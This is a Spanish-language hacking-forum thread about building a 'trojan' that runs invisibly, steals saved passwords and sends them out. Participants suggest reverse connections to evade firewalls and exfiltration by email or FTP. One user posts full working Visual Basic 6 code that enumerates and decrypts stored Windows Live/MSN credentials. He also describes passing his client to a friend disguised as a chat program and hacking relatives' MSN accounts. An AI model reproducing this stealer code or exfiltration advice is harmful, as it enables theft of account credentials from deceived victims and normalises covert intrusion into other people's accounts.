hola!
hace tiempo habia creado un 'troyano', nose como decirle. la cosa es q entraba, obtenia informacion, me la mandaba y se eliminaba.
lo de eliminarse es lo de menos, pero tengo el proyecto en mi disco duro usb usb, el cual perdi el cable, y no me acuerdo ni la base...
se que en internet esta LLENO de info sobre esto, pero siempre resulto con dudas
eso no significa que no este buscando, claro que busco! y si lo soluciono, aviso y pongo la solucion; para eso son los foros ♥
s2
Lee sobre Sockets para conectar cliente-servidor y acordate q el server se tendra q conectar al cliente, para q sea inversa la conexion y te saques el problema del firewall ya q sos vs el q tendra q abrir los puertos no la otra pc.
Primero aprende a crear un simple Chat y desp ya entenderas como es la cosa vas a ver q es facil, ya q lo dificil es tener todas esas opciones q tienen los troyanos, pero un troyano simple podes hacer sin problemas
ok, ya empiezo a recordar....
aclaro que no quiero hacer ni troyanos ni nada de eso, sino algo que me sirva cuando lo necesite.
s2
el pibe tenia un stealer.
Busca mandar emails y subir a ftps.
Capas que por ahi vas mas facil.
recien termine un server y un cliente
el cliente abria invisible y el server recibia todas las contraseñas guardadas
a la hora de compilar, me tilda el vb
lo hice todo devuuelta
le pase el cliente a un amigo diciendo q era un chat
resulta q le falta una dll (no el ocx de wsock), asi que ni inicia
Si quieren seguir aportando al tema, esta bien, para eso esta, pero el dueño capaz lo agarre otro dia ^^ (Digo esto porque despues cuando abren otro tema se quejan que siempre lo mismo xd)
para eso nukje manda emails o subi a un ftp, va a ser mas facil.
Ahora, si queres usar winsocks sin el ocx existe un wsock que usa las apis.
Busca seguro sale porque es muy conocido.
PD: Como averiguas las contraseñas, contraseñas de que? para que? (Robar es malo :xD)
Cita de: Elemental Code en 23 Abril 2011, 22:58 PM
para eso nukje manda emails o subi a un ftp, va a ser mas facil.
Ahora, si queres usar winsocks sin el ocx existe un wsock que usa las apis.
Busca seguro sale porque es muy conocido.
PD: Como averiguas las contraseñas, contraseñas de que? para que? (Robar es malo :xD)
ajja , tenes razon, voy a ver eso de ftp.... o emails
para robar contraseñas de msn,
'codigo de karcrack - elhacker.net
Option Explicit
'KERNEL32
Private Declare Function GetProcessHeap Lib "KERNEL32" () As Long
'ADVAPI32
Private Declare Function CredEnumerateW Lib "ADVAPI32" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
'CRYPT32
Private Declare Function CryptUnprotectData Lib "CRYPT32" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As Long) As Long
'NTDLL
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal ProcessHandle As Long, ByVal BaseAddress As Long, ByVal pBuffer As Long, ByVal NumberOfBytesToWrite As Long, ByRef NumberOfBytesWritten As Long) As Long
Private Declare Function RtlFreeHeap Lib "NTDLL" (ByVal HeapHandle As Long, ByVal Flags As Long, ByVal MemoryPointer As Long) As Long
Private Type DATA_BLOB
cbData As Long
pbData As Long
End Type
Private Type ACCOUNT_INFO
sMail As String
sPassword As String
End Type
Private Function sMSN() As ACCOUNT_INFO()
Dim tTMP() As ACCOUNT_INFO
Dim i As Long
Dim x As Long
Dim lCount As Long
Dim lCred As Long
Dim lPtr As Long
Dim lUser As Long
Dim tBlobIn As DATA_BLOB
Dim bvGUID(4) As Currency
bvGUID(0) = 2814797012434.9527@
bvGUID(1) = 2139259215904.7791@
bvGUID(2) = 1632598244864.8297@
bvGUID(3) = 2842944080556.8622@
bvGUID(4) = 275.2573@
'bvGUID = "WindowsLive:name=*"
Call CredEnumerateW(VarPtr(bvGUID(0)), 0, lCount, lCred)
For i = 0 To lCount - 1
Call NtWriteVirtualMemory(-1, ByVal VarPtr(lPtr), ByVal lCred + (i * &H4), &H4, 0)
Call NtWriteVirtualMemory(-1, ByVal VarPtr(lUser), ByVal (lPtr + &H30), &H4, 0)
Call NtWriteVirtualMemory(-1, ByVal VarPtr(tBlobIn.cbData), ByVal (lPtr + &H18), &H8, 0)
Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, 0&)
If tBlobIn.cbData Then
ReDim Preserve tTMP(x)
With tTMP(x)
.sPassword = Space$(tBlobIn.cbData \ 2)
Call NtWriteVirtualMemory(-1, ByVal StrPtr(.sPassword), ByVal tBlobIn.pbData, tBlobIn.cbData, 0)
If Len(.sPassword) > 0 Then
.sMail = uReadStr(lUser)
End If
End With
x = x + 1
End If
Next i
Call RtlFreeHeap(GetProcessHeap(), 0, lCred)
sMSN = tTMP
End Function
Private Function uReadStr(ByVal lPtr As Long) As String
Dim iChar As Integer
Dim i As Long
Do
Call NtWriteVirtualMemory(-1, ByVal VarPtr(iChar), ByVal (lPtr + i * 2), 2, ByVal 0&)
i = i + 1
If iChar = 0 Then Exit Do
uReadStr = uReadStr & ChrW$(iChar)
Loop
End Function
Private Sub Command1_Click()
Dim i As Long
Dim x() As ACCOUNT_INFO
x = sMSN
For i = LBound(x) To UBound(x)
MsgBox x(i).sMail & " - " & x(i).sPassword
Next i
End Submas muestra en un msgbox ;
p.d: tube que hackear los msn de unos familiares (los del otro equipo JAJAJ), paraobtener unos datos.... alfinal los hackie sin este "stealer" ; aunque fue algo very lammer. JAJAAJJAJ.
como no encontre lo que necesitaba en esos msn (vease mi post en hacking avanzado), devolvi sus respectivas passwords.
juraria que esa funcion es de karcrack y es la misma funcion que usa mi Elemental MSN Stealer 2.0 :¬¬
nose, la tengo guardada hace muuuuuuuuuuuuuuuuuuuuuuuuuucho (pero aclaro que mia no es, y nunca dije que es mia)
ahora edito y le pongo los creditos, no sabia que era de el ;)
Ahora estoy con otra, :p
estoy subiendo el archivo desde un bat, (me esta liando... y eso que es facil!)
http://foro.elhacker.net/scripting/batch_ftp_error-t325543.0.html;msg1606466
pro: todas, cuando lo solucione :p
contra: firewall..................
Ahora voy a ver que es lo que realmente me combiene, si luchar con el firewall (? , o desde vb6.
s2